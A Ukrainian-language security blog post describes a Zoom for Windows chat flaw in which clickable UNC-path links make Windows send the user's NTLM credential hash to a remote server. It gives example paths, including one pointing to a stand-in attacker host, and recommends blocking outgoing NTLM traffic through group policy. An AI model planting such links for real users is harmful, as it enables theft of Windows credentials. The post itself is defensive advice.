Вразливість в Zoom для Windows

Під час пандемії все більше людей починають працювати віддалено та проводити конференції чи засідання онлайн.

Zoom – одна з найпопулярніших програм для відеоконференцій. Версія даного програмного забезпечення для Windows має вразливість у чаті, в якому учасники зустрічей можуть спілкуватися між собою, надсилаючи текстові повідомлення.

Натискання на посилання із UNC шляхом може дозволити зловмисникам красти дані облікового запису Windows.

UNC – це літеральний рядок, який вказує розташування файлу в файловій системі, адреса каталогу.

Наприклад, звичайна URL-адреса, але із UNC шляхом (\\ evil.server.com \ images \ cat.jpg) перетворюються у гіперпосилання на яке можна натиснути аби відкрити веб-сторінку у своєму браузері, але в такому разі Windows спробує під’єднатися до віддаленого сайту за допомогою протоколу обміну файлами SMB, щоб відкрити віддалений файл cat.jpg.

Здійснюючи це, Windows за замовчуваннямнадсилає ім’я користувача та хеш паролю NTLM, який можна відновити за допомогою безкоштовних інструментів, таких як Hashcat.

Наприклад посилання (\\ 127.0.0.1 \ C $ \ windows \ system32 \ calc.exe) запропонує користувачеві запустити калькулятор.

Що робити?

  • Не відкривайте посилання, які починаються з “\\”. Будьте пильними, поки ZOOM готує оновлення безпеки.
  • Заборонити вихідний NTLM трафік до віддалених серверів, налаштувавши відповідну групову політику: Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options → Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers. У випадаючому меню вибрати “Deny all”.

Але це може створити проблеми з доступом до спільних ресурсів по протоколу SMB, як додати виключення описано тут (https://www.bleepingcomputer.com/news/security/understanding-the-windows-credential-leak-flaw-and-how-to-prevent-it/).

0

Автор публікації

Офлайн 4 тижні

Ihor Romanets

0
Коментарі: 0Публікації: 203Реєстрація: 02-10-2017